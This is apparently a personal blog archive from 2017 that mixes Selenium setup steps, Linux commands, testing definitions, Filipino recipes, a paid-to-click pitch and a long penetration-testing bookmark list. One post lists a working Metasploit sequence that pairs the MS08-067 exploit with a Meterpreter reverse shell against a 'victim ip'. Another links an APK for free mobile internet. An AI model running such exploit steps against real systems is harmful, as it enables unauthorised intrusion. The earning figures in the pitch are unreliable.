Monday, December 4, 2017

Test Automation Framework Youtube Tut links

Cucumber Framework
https://www.youtube.com/watch?v=pD4B839qfos&list=PL_noPv5wmuO_t6yYbPfjwhJFOOcio89tI

Sunday, November 26, 2017

Selenium WebDriver Eclipse Java Project Setup

Selenium WebDriver Eclipse Java Project Setup

1.Open eclipse
2.Create project
3.Go to seleniumhq.org/download
  3A.Under "Selenium Server(formerly the Selenium RC Server)" header title -> click donwload version
  3B.Under "Selenium Client & WebDriver Language Bindigns" header title -> click Java Download
4.Go to eclipse>File>Folder>Create Folder name "lib"
5.Drag downloaded file "selenium-server-standalone-2.31.0.jar" file to created "lib" folder
6.Drag downloaded file from seleniu-java-2.31.0.zip folder the "selenium-java.2.31.0.jar" file to created lib folder
7.In lib folder select all the two dragged java files and click Build Path>Add to Build Path -> output: java files will be created in Referenced Libraries
8.Go to sourceforge.net/projects/junit/files/junit and click 4.10 folder
 8A.click "junit-4.10.jar"
9.Drag downloaded "junit-4.10.jar" file to created lib folder the build path>add to build path
10.Run test script in Selenium IDE and Export Test Case As.. Java/Unit4/WebDriver then save in created project folder>src in .java file
11.refresh Eclipse and click src then click exported test case.java file
12.in exported test case java file delete package com.example.test; and save

tags:
#selenium #webdriver #automation #TestAutomation

Monday, October 16, 2017

Linux Search Logs File Command


tail -f /var/log/messages [will display 10lines of a file]
tail -50 -f /var/log/messages [will display more than 10 lines]
less /var/log/messages [to search entire log]
less /keyword [to search specific keyword in log file]

grep 'word' filename
grep 'word' file1 file2 file3
grep 'string1 string2'  filename
grep passwordname /etc/passwd

Tags:
#linux, #search, #grep, #less, #tail, #grep

Reference: Click here

Sunday, October 15, 2017

Basic Command Line in Linux


mkdir [make directory]
rm -r diretoryname [remove directory]
mv directory1/sample.txt directory2/sample.txt [to move file in another directory]
cp directory1/sample.txt directory2/ [to copy file in another directory]
rm directory/sample.txt [to delete file in directory]

Create file
cat > sample.txt [to create content file]
type sample text file
another line text.
Ctrl+D [to exit file once done editing]
ls -l sample.txt [to verify edited file]
cat sample.txt [to view file content]
> sample.txt [to create blank content file]
touch sample.txt [to create blank content file]
vi sample.txt [to add text in the file]
Esc then :wq [close vi and save file]



#Tags
#linux, #linuxcommands, #basiclinux, #basiclinuxcommands, #unix

Thursday, October 12, 2017

Software Testing

Regression Testing 
Is a type of software testing which verifies that software which was previously developed and tested still performs the same way after it was changed or interfaced with other software. Changes may include software enhancements, patches, configuration changes.
Regression testing is the process of testing changes to computer programs to make sure that the older programming still works with the new changes. Regression testing is a normal part of the program development process and, in larger companies, is done by code testing specialists.

Integration testing 
(sometimes called integration and testing, abbreviated I&T) is the phase in software testing in which individual software modules are combined and tested as a group. It occurs after unit testing and before validation testing

Software Types of testing

  • Unit Testing
  • Integration Testing
  • Functional Testing
  • System Testing
  • Stress Testing
  • Performance Testing
  • Usability Testing
  • Acceptance Testing
  • Regression Testing
  • Beta Testing  

Agile 
Software development refers to a group of software development methodologies based on iterative development, where requirements and solutions evolve through collaboration between self-organizing cross-functional teams.

Waterfall 
Model is a linear sequential (non-iterative) design approach for software development, in which progress flows in one direction downwards (like a waterfall) through the phases of conception, initiation, analysis, design, construction, testing, deployment and maintenance

Software Test Plan 
Is a document describing the testing scope and activities. It is the basis for formally testing anysoftware/product in a project. ISTQB Definitiontest plan: A document describing the scope, approach, resources and schedule of intended test activities
test cases

Test case 
Is a set of conditions or variables under which a tester will determine whether a system under test satisfies requirements or works correctly. The process of developing test cases can also help find problems in the requirements or design of an application.
black/white box testing

Black box testing 
Is the Software testing method which is used to test the software without knowing the internal structure of code or program. 

White box testing 

Is the software testing method in which internal structure is being known to tester who is going to test the software

Software Application 6 Quality Characteristics.

  1. Functionality
  2. Reliability
  3. Usability
  4. Efficiency
  5. Maintainability
  6. Portability
Site Reference: Click Me!

Defect Log Severity Status
Critical
  • Defect results in termination of system or one or more component. The failed function is unusable and there is no acceptable alternative method.
  • Defect causes the business functions to be useless or vulnerable to high business risk
Major
  • Defect results in termination of the system or one or more component. The failed function is unusable but there exists an acceptable alternative method.
Moderate
  • Defect does not result in termination but causes the system to produce incorrect, incomplete or inconsistent results
  • Defect causes the business functions to be useless or vulnerable to high business risk
Critical
  • Defect results in termination of system or one or more component. The failed function is unusable and there is no acceptable alternative method.
  • Defect causes the business functions to be useless or vulnerable to high business risk
Tags:
QA, Software Testing, Quality Assurance 

10 Linux Commands

ls - show all of the major directories
cd - change directories
mv - move file to another directory
man - manuel of inputted commands
mkdir - make new directory
rmdir - remove directory
touch - make file
rm - delete created files
locate - to find a file (locate -i *red*house**city)
clear - to clear commands

Tags
#linux
#commands
#technology
#unix

Reference site: Click Me

Thursday, September 28, 2017

Chicken Adobo



Ingredients
2 lbs. chicken, cut into serving pieces
3 pieces dried bay leaves
4 tbsp soy sauce
2 tbsp vinegar
3 cloves garlic, crushed
1 to 2 cups water
¼ cup cooking oil
½ tablespoon white sugar
Salt and whole peppercorn

Instructions
In a large container, combine the soy sauce and garlic then marinade the chicken for at least 1 to 3 hours
Place the cooking oil in a pan and apply heat
When the oil is hot enough, put-in the marinated chicken. Cook all the sides for about 5 minutes.
Pour-in the remaining marinade and add water. Bring to a boil
Add the dried bay leaves and whole peppercorn. Simmer for 30 minutes or until the chicken is tender
Add vinegar. Stir and cook for 10 minutes.
Put-in the sugar, and salt. Stir and turn the heat off.
Serve hot. Share and Enjoy!
Nutrition Information
Serving size: 4 Calories: 450

Tags:
#Food
#meal
#chicken
#adobo

Sunday, September 24, 2017

Chicken Macaroni Soup (Sopas)



Ingredients
½ kilo chicken meat preferably breast part
2 gloves garlic minced
2 medium white onions
1 large bell pepper seeded and sliced into strips
½ tablespoon freshly ground black pepper
2 medium carrot sliced into thin strips
350 grams macaroni noodles
1 medium cabbage roughly shredded
2 tablespoon margarine
2 tablespoon fish sauce
½ tablespoon rock salt
2 pieces hotdogs sliced

servings: 5 people

Instructions

Instructions
1. Boil the chicken in 4 cups water. Save the broth to be used later.
2. Shred the Chicken meat with your fingers. Set aside.
3. Saute garlic and onion in oil over medium heat.
4. Add the bell pepper and cook until aromatic.
5. Stir in the shredded chicken and sliced hotdogs.
6. Season lightly with ground black pepper.
7. Add the carrots, a quick sauté then the macaroni. Give it a stir to get the fat all around the pasta.
8. Add the margarine.
9. Serve whilte hot!

Tags:
#Food
#meal
#chicken
#soup

Buttered Garlic Shrimp




Ingredients:

shrimp
chopped garlic
1/4 bar of butter
parsley
2 cups of 7UP or Sprite
salt and pepper

Cooking Instructions:

1. Soak the shrimp in 7UP for ten minutes.
2. On a frying pan, melt the butter then sautee the chopped garlic until it turns brown.
3. Pour in the soaked shrimp in 7UP then wait until the shrimp is cooked.
4. Pour in the parsley, salt and pepper. If the sauce is too much, separate the shrimp then wait until the sauce evaporates.

Tags:
#Food
#meal
#shrimp
#seafood

Adobong baboy(Pork Adobo)



Ingredients

  • 2 pounds of pork belly, cut into serving pieces
  • 4 tablespoons of vinegar
  • 1 cup of soy sauce
  • 6 cloves of garlic, peeled then crushed
  • 1 teaspoon of sugar
  • 3-5 pieces of bay leaf
  • 1 tablespoon of black peppercorns
  • 12 cup of water
  • salt to taste

Instructions

  1. In a bowl, marinate the pork along with crushed garlic, and soy sauce for at least 30 minutes.
  2. Heat a pan over medium-high heat.
  3. Transfer the pork and marinade into the pan.
  4. Add all the remaining ingredients, except for the vinegar.
  5. Let it simmer for 10 minutes while occasionally stirring.
  6. Add the vinegar and simmer for a few more minutes.
  7. Now add salt to taste and add more water or soy sauce depending on your taste.
  8. Be careful not to overcook the pork so that it is still tender.
  9. Remove the pork from the pan and place it on a serving dish.
  10. Take the remaining sauce from the pan and serve it alongside the adobo.
Tags:
#Food
#meal
#pork

SINIGANG-SEASONED FRIED CHICKEN

SINIGANG-SEASONED FRIED CHICKEN



INGREDIENTS
1 kg Chicken leg/drumstick, washed and pat-dried
1 (20g) pack Knorr Sinigang sa Sampaloc Mix Original
2 tbsp Fish sauce
Cooking oil for deep frying

LET'S GET COOKING
1. Begin by marinating chicken in KNORR Sinigang Sa Sampaloc Mix Original and fish sauce for at least 30 minutes.

2. Now get your pan nice and hot over medium heat. Pour enough oil then deep fry marinated chicken a few pieces at a time, about 10-12 minutes or until golden brown and fully cooked.

3. Do not overcrowd pan when deep frying to make sure all pieces will be crispy and will brown nicely. This will also make frying faster because the heat in the oil is maintained.

4. Place on paper towel to remove excess oil. And that's our dish. Once you try this recipe, it will surely become one of your favourite dishes. It’s amazingly delicious!

Tags:
#Food
#meal
#chicken

BINAGOONGANG MANOK RECIPE

BINAGOONGANG MANOK RECIPE



INGREDIENTS
1 tbsp oil 2 pcs tomatoes,
sliced 1 tbsp onion,
chopped 1 tbsp garlic,
chopped 1/2 cup bagoong

3 tbsp white sugar 1 pc chicken whole (16 cut)
2 cups water
2 pcs Knorr Chicken Cube
1 pc siling haba, sliced

LET'S GET COOKING
1. Begin by getting your pan nice and hot over high heat and pour in a little bit of oil. Throw in the tomatoes, onion and garlic and cook until you can smell the nice aroma from the vegetables. Drop in the bagoong and sugar before adding the chicken. Mix well and sauté for at least 2-3 minutes.

2. Pour in the water with the Knorr Chicken Cubes and bring this to a simmer over low heat for a good 15 minutes or until the chicken is cooked through.

3. Just one more step and this mouth-watering Chicken Binagoongan is ready for serving. For that added spice, top your Chicken Binagoongan with a sprinkle of chilli. Finally, it’s time to eat!

Tags
#Food
#meal
#chicken

Sunday, July 9, 2017

Free Internet using Globe

1.Use Globe/TM Sim !!!
2.Settings>More...>Cellular networks>Use default APN (internet.globe.com.ph)
3.DL apk here http://www.datafilehost.com/d/eea73a51
4.APK downloaded select any server

Wednesday, June 21, 2017

PTC

Thumbs up Paid To Click Sites that pay good =) 
Ito ang mga trusted Paid To Click (PTC) Sites na i-rerecommend ko.
They really pay good. 

You may sign up on the following: 

neobux PLEASE PUT---> RefeRrer: jesdy14
bux.gs

theclickers.net

bluethunder

* Pero sa mga hindi pa nakaka-alam kung paano ang process dito, just read the following:

Pwedeng kumita online. You just need to allot 1 to 2 hours depending on your availability. Walang cash out or capital dito. TOTALLY FREE.


All you need is:


1. own PC or laptop

2. Internet Connection (Broadband/DSL)

3. Email address

4. Alertpay at Paypal Account (You will be paid in these sites)
If you don't have an alertpay and paypal account, register for free at 
www.alertpay.com and www.paypal.com


STEP1:
 Make your own email account

STEP2:
 Make your own PAYMENT PROCESSORS account ONLINE

Alertpay or Paypal Account.
-Choose Personal Account.
-You dont need to have a credit card to be paid, you may use an EON card (union Bank) or even Smart Money.

NOW that you have your own paypal or alertpay account, YOU ARE READY TO START! 


STEP3:

Sumali ka sa mga PTC Sites, click on the advertisements. Each advertisement has a corresponding amount, na madadagdag sa money mo. Eventually, upon reaching the maximum cashout, pwede mo na makuha ang money through paypal / alertpay.

Pero paano mapapabilis ang paglaki ng income? Gumawa lang ng advertisement na katulad nito. Post it sa mga forums. Or invite friends through facebook, friendster and multiply.

Earning Example on 1 PTC site

» You click 10 ads per day = $0.10
» 20 referrals click 10 ads per day = $2.00
» Your daily earnings = $2.10
» Your monthly earnings = $63.00

So if you have 20 PTC programs with 20 referrals on each site,
PTC site with 20 referrals = $63.00
$63.00 x 20PTC sites = $1,260 per month


NOW, your TOTAL potential earnings:
$1,260.00
that is Php 59,220.00 per month while at HOME!!! 


If you have any questions don't hesitate to leave a message. Happy clicking!!! 
 

http://www.pinoyexchange.com/forums/showthread.php?t=407621

Sunday, June 18, 2017

Hack Like A Pro Websites

Below List of Websites:

http://www.hacking-tutorial.com/
http://www.evilzone.org/
http://hackaday.com/
http://www.hackinthebox.org/
http://www.hackthissite.org/

https://www.scribd.com/

Hack Computer other computer using Kali Linux

This tut can be executed using kali linux metaexploit


open msfconsole in kali cmd
use windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your ip address(type ifconfig to check ur ip)
set LPORT 4444
set RHOST victim ip
set RPORT 445
exploit
(you should connect)
type help for a list of commands

Thursday, June 8, 2017

Muyat Yang Kamo It Pelikula


HOLLYWOOD MOVIES
Movie List Per Year: 
2017 | 2016 | 2015 | 2014 | 2013 | 2012 | 2011 | 2010 | 2009 | 2008 | 2007 | 2006 | 2005 | 2004 | 2003 | 2002 | 2001 | 2000 |


PINOY MOVIES
Movie List Per Year: 
2017 | 2016 | 2015 | 2014 | 2013 | 2012 | 2011 | 2010 | 2009 | 2008 | 2007 | 2006 | 2005 | 2004 | 2003 2002 2001 2000 | 70s-90s
TAGALOG DUB MOVIES |

Penetration Testing Bookmarks Collections

Penetration Testing Bookmarks Collections

Penetration Testing

http://carnal0wnage.blogspot.com/
http://www.mcgrewsecurity.com/
http://www.gnucitizen.org/blog/
http://www.darknet.org.uk/
http://spylogic.net/
http://taosecurity.blogspot.com/
http://www.room362.com/
http://blog.sipvicious.org/
http://blog.portswigger.net/
http://pentestmonkey.net/blog/
http://jeremiahgrossman.blogspot.com/
http://i8jesus.com/
http://blog.c22.cc/
http://www.skullsecurity.org/blog/
http://blog.metasploit.com/
http://www.darkoperator.com/
http://blog.skeptikal.org/
http://preachsecurity.blogspot.com/
http://www.tssci-security.com/
http://www.gdssecurity.com/l/b/
http://websec.wordpress.com/
http://bernardodamele.blogspot.com/
http://laramies.blogspot.com/
http://www.spylogic.net/
http://blog.andlabs.org/
http://xs-sniper.com/blog/
http://www.commonexploits.com/
http://www.sensepost.com/blog/
http://wepma.blogspot.com/
http://exploit.co.il/
http://securityreliks.wordpress.com/
http://www.madirish.net/index.html
http://sirdarckcat.blogspot.com/
http://reusablesec.blogspot.com/
http://myne-us.blogspot.com/
http://www.notsosecure.com/
http://blog.spiderlabs.com/
http://www.corelan.be/
http://www.digininja.org/
http://www.pauldotcom.com/
http://www.attackvector.org/
http://deviating.net/
http://www.alphaonelabs.com/
http://www.smashingpasswords.com/
http://wirewatcher.wordpress.com/
http://gynvael.coldwind.pl/
http://www.nullthreat.net/
http://www.question-defense.com/
http://archangelamael.blogspot.com/
http://memset.wordpress.com/
http://sickness.tor.hu/
http://punter-infosec.com/
http://www.securityninja.co.uk/
http://securityandrisk.blogspot.com/
http://esploit.blogspot.com/
http://www.pentestit.com/ 

Forums:

Created for forums that will help in both tool usage, syntax, attack techniques, and collection of scripts and tools. Needs some help. I don't really frequent too many underground forums but i actually find nice one-off scripts and info i can roll into my own code in these places. Would like to add more. 

http://sla.ckers.org/forum/index.php
http://www.ethicalhacker.net/
http://www.backtrack-linux.org/forums/
http://www.elitehackers.info/forums/
http://www.hackthissite.org/forums/index.php
http://securityoverride.com/forum/index.php
http://www.iexploit.org/
http://bright-shadows.net/
http://www.governmentsecurity.org/forum/
http://forum.intern0t.net/ 

Magazines:

http://www.net-security.org/insecuremag.php
http://hakin9.org/ 

Video:

http://www.hackernews.com/
http://www.securitytube.net/
http://www.irongeek.com/i.php?page=v...de-winter-2011
http://avondale.good.net/dl/bd/
http://achtbaan.nikhef.nl/27c3-stream/releases/mkv/
http://www.youtube.com/user/ChRiStIaAn008
http://www.youtube.com/user/HackingCons 

Methodologies:

http://www.vulnerabilityassessment.c...on%20Test.html
http://www.pentest-standard.org/index.php/Main_Page
http://projects.webappsec.org/w/page...Classification
http://www.owasp.org/index.php/Categ...op_Ten_Project
http://www.social-engineer.org/ 

OSINT

Presentations:

http://www.spylogic.net/2009/10/ente...cial-networks/
http://www.spylogic.net/2009/10/ente...-and-metadata/
http://www.spylogic.net/2009/10/ente...-3-monitoring/
http://www.slideshare.net/Laramies/t...tion-gathering
http://www.sans.org/reading_room/whi..._killer__32974
http://infond.blogspot.com/2010/05/t...tprinting.html 

People and Organizational:

http://www.spokeo.com/
http://www.123people.com/
http://www.xing.com/
http://www.zoominfo.com/search
http://pipl.com/
http://www.zabasearch.com/
http://www.searchbug.com/default.aspx
http://theultimates.com/
http://skipease.com/
http://addictomatic.com/
http://socialmention.com/
http://entitycube.research.microsoft.com/
http://www.yasni.com/
http://tweepz.com/
http://tweepsearch.com/
http://www.glassdoor.com/index.htm
http://www.jigsaw.com/
http://searchwww.sec.gov/EDGARFSClie...MainAccess.jsp
http://www.tineye.com/
http://www.peekyou.com/
http://picfog.com/
http://twapperkeeper.com/index.php 

Infrastructure:

http://uptime.netcraft.com/
http://www.serversniff.net/
http://www.domaintools.com/
http://centralops.net/co/
http://hackerfantastic.com/
http://whois.webhosting.info/
https://www.ssllabs.com/ssldb/analyze.html
http://www.clez.net/
http://www.my-ip-neighbors.com/
http://www.shodanhq.com/
http://www.exploit-db.com/google-dorks/
http://www.hackersforcharity.org/ghdb/ 

Exploits and Advisories:

http://www.exploit-db.com/
http://www.cvedetails.com/
http://www.milw0rm.com/ (Down permanently)
http://www.packetstormsecurity.org/
http://www.securityforest.com/wiki/index.php/Main_Page
http://www.securityfocus.com/bid
http://nvd.nist.gov/
http://osvdb.org/
http://www.nullbyte.org.il/Index.html
http://secdocs.lonerunners.net/
http://www.phenoelit-us.org/whatSAP/index.html
http://secunia.com/
http://cve.mitre.org/ 

Cheatsheets and Syntax:

http://cirt.net/ports_dl.php?export=services
http://www.cheat-sheets.org/
http://blog.securitymonks.com/2009/0...-cheat-sheets/ 

Agile Hacking:

http://www.gnucitizen.org/blog/agile...d-portscanner/
http://blog.commandlinekungfu.com/
http://www.securityaegis.com/simple-...-bruteforcing/
http://isc.sans.edu/diary.html?storyid=2376
http://isc.sans.edu/diary.html?storyid=1229
http://ss64.com/nt/
http://pauldotcom.com/2010/02/runnin...every-mac.html
http://synjunkie.blogspot.com/2008/0...-ninjitsu.html
http://www.zonbi.org/2010/06/09/wmic...er-white-meat/
http://rstcenter.com/forum/22324-hac...ls-windows.rst
http://www.coresecurity.com/files/at...n_Cmd_Line.pdf
http://www.scribd.com/Penetration-Te...tcat/d/3064507
http://www.pentesterscripting.com/
http://www.sans.org/reading_room/whi...-windows_33583
http://www.blackhat.com/presentation...ation-1-wp.pdf 

OS and Scripts:

http://en.wikipedia.org/wiki/IPv4_subnetting_reference
http://www.nixtutor.com/linux/all-th...-cheat-sheets/
http://shelldorado.com/shelltips/beginner.html
http://www.linuxsurvival.com/
http://mywiki.wooledge.org/BashPitfalls
http://rubular.com/
http://www.iana.org/assignments/port-numbers
http://www.robvanderwoude.com/ntadmincommands.php
http://www.nixtutor.com/linux/all-th...-cheat-sheets/ 

Tools:

http://www.sans.org/security-resourc...t_sheet_v1.pdf
http://www.secguru.com/files/cheatsh...cheatSheet.pdf
http://sbdtools.googlecode.com/files...t_v1.0-ENG.pdf
http://sbdtools.googlecode.com/files...20eng%20v1.pdf
http://www.sans.org/security-resourc...s_sheet_v1.pdf
http://rmccurdy.com/scripts/Metasplo...reference.html
http://h.ackack.net/cheat-sheets/netcat 

Distros:

http://www.backtrack-linux.org/
http://www.matriux.com/
http://samurai.inguardians.com/
http://www.owasp.org/index.php/Categ...ive_CD_Project
https://pentoo.ch/
http://www.hackfromacave.com/article...2_release.html
http://www.piotrbania.com/all/kon-boot/
http://www.linuxfromscratch.org/
http://sumolinux.suntzudata.com/
http://blog.0x0e.org/2009/11/20/pent...-box/#comments
http://www.backbox.org/ 

Labs:

ISOs and VMs:

http://sourceforge.net/projects/websecuritydojo/
http://code.google.com/p/owaspbwa/wiki/ProjectSummary
http://heorot.net/livecds/
http://informatica.uv.es/~carlos/docencia/netinvm/
http://www.bonsai-sec.com/en/research/moth.php
http://blog.metasploit.com/2010/05/i...ploitable.html
http://pynstrom.net/holynix.php
http://gnacktrack.co.uk/download.php
http://sourceforge.net/projects/lampsecurity/files/
https://www.hacking-lab.com/news/new...available.html
http://sourceforge.net/projects/virtualhacking/files/
http://www.badstore.net/
http://www.irongeek.com/i.php?page=s...p-owasp-top-10
http://www.dvwa.co.uk/
http://sourceforge.net/projects/thebutterflytmp/ 

Vulnerable Software:

http://www.oldapps.com/
http://www.oldversion.com/
http://www.exploit-db.com/webapps/
http://code.google.com/p/wavsep/downloads/list
http://www.owasp.org/index.php/Owasp_SiteGenerator
http://www.mcafee.com/us/downloads/f...acmebooks.aspx
http://www.mcafee.com/us/downloads/f...me-casino.aspx
http://www.mcafee.com/us/downloads/f...eshipping.aspx
http://www.mcafee.com/us/downloads/f...cmetravel.aspx 

Test Sites:

http://www.webscantest.com/
http://crackme.cenzic.com/Kelev/view/home.php
http://zero.webappsecurity.com/bankl...w.Freebank.com
http://testaspnet.vulnweb.com/
http://testasp.vulnweb.com/
http://testphp.vulnweb.com/
http://demo.testfire.net/
http://hackme.ntobjectives.com/ 

Exploitation Intro:

If you'd like to get into exploit dev, these are really the guides and docs that will start you off in the right direction. Since Exploit dev is not my primary occupation this section could always use help.

http://myne-us.blogspot.com/2010/08/...rney-into.html
http://www.mgraziano.info/docs/stsi2010.pdf
http://www.abysssec.com/blog/2010/05...-exploitation/
http://www.ethicalhacker.net/content/view/122/2/
http://code.google.com/p/it-sec-cata...i/Exploitation
http://x9090.blogspot.com/2010/03/tu...rial-from.html
http://ref.x86asm.net/index.html 

Reverse Engineering & Malware:

http://www.woodmann.com/TiGa/idaseries.html
http://www.binary-auditing.com/
http://visi.kenshoto.com/
http://www.radare.org/y/
http://www.offensivecomputing.net/ 

Passwords and Hashes:

http://www.irongeek.com/i.php?page=v...oitation-class
http://cirt.net/passwords
http://sinbadsecurity.blogspot.com/2...-recovery.html
http://www.foofus.net/~jmk/medusa/medusa-smbnt.html
http://www.foofus.net/?page_id=63
http://hashcrack.blogspot.com/
http://www.nirsoft.net/articles/save..._location.html
http://www.onlinehashcrack.com/
http://www.md5this.com/list.php?
http://www.virus.org/default-password
http://www.phenoelit-us.org/dpl/dpl.html
http://news.electricalchemy.net/2009...-in-cloud.html 

Wordlists:

http://contest.korelogic.com/wordlists.html
http://packetstormsecurity.org/Crackers/wordlists/
http://www.skullsecurity.org/wiki/index.php/Passwords
http://www.ericheitzman.com/passwd/passwords/ 

Pass the Hash:

http://www.sans.org/reading_room/whi...tigation_33283
http://www.sans.org/reading_room/whi...ass-hash_33219
http://carnal0wnage.blogspot.com/200...h-toolkit.html 

MiTM:

http://www.giac.org/certified_profes.../gsec/0810.php
http://www.linuxsecurity.com/docs/PD...f-n-mirror.pdf
http://www.cs.uiuc.edu/class/sp08/cs...des/dsniff.pdf
http://www.techvibes.com/blog/a-hack...-personal-data
http://www.mindcenter.net/uploads/ECCE101.pdf
http://toorcon.org/pres12/3.pdf
http://media.techtarget.com/searchUn...ttacks_Ch3.pdf
http://packetstormsecurity.org/paper...acking-air.pdf
http://www.blackhat.com/presentation...03-valleri.pdf
http://www.oact.inaf.it/ws-ssri/Costa.pdf
http://www.defcon.org/images/defcon-...ng_web_2.0.pdf
http://mcafeeseminar.com/focus/downl...ve_Hacking.pdf
http://www.seanobriain.com/docs/Pass...-MITMGuide.pdf
http://www.more.net/sites/default/fi...andKeynote.pdf
http://www.leetupload.com/database/M...rcap_Spoof.pdf
http://bandwidthco.com/whitepapers/n...&%20Beyond.pdf
http://bandwidthco.com/whitepapers/n...%20Filters.pdf
http://www.iac.iastate.edu/iasg/liba...f_Ettercap.pdf
http://articles.manugarg.com/arp_spoofing.pdf
http://academy.delmar.edu/Courses/IT...tack-tool).pdf
http://www.ucci.it/docs/ICTSecurity-2004-26.pdf
http://web.mac.com/opticrealm/iWeb/a...v_6_2005-1.pdf
http://blog.spiderlabs.com/2010/12/thicknet.html
http://www.hackyeah.com/2010/10/ette...owser_autopwn/
http://www.go4expert.com/forums/showthread.php?t=11842
http://www.irongeek.com/i.php?page=s...ettercapfilter
http://openmaniak.com/ettercap_filter.php
http://www.irongeek.com/i.php?page=v...ercap-pharming
http://www.irongeek.com/i.php?page=v...scover-isolate
http://www.irongeek.com/i.php?page=v...rcapfiltervid1
http://spareclockcycles.org/2010/06/...roxy-released/ 

Tools:

OSINT:

http://www.edge-security.com/theHarvester.php
http://www.mavetju.org/unix/dnstracer-man.php
http://www.paterva.com/web5/ 


CREDITS: MOR LINKS HERE:

https://code.google.com/p/pentest-bo.../BookmarksList


http://pinoyprogrammer.co/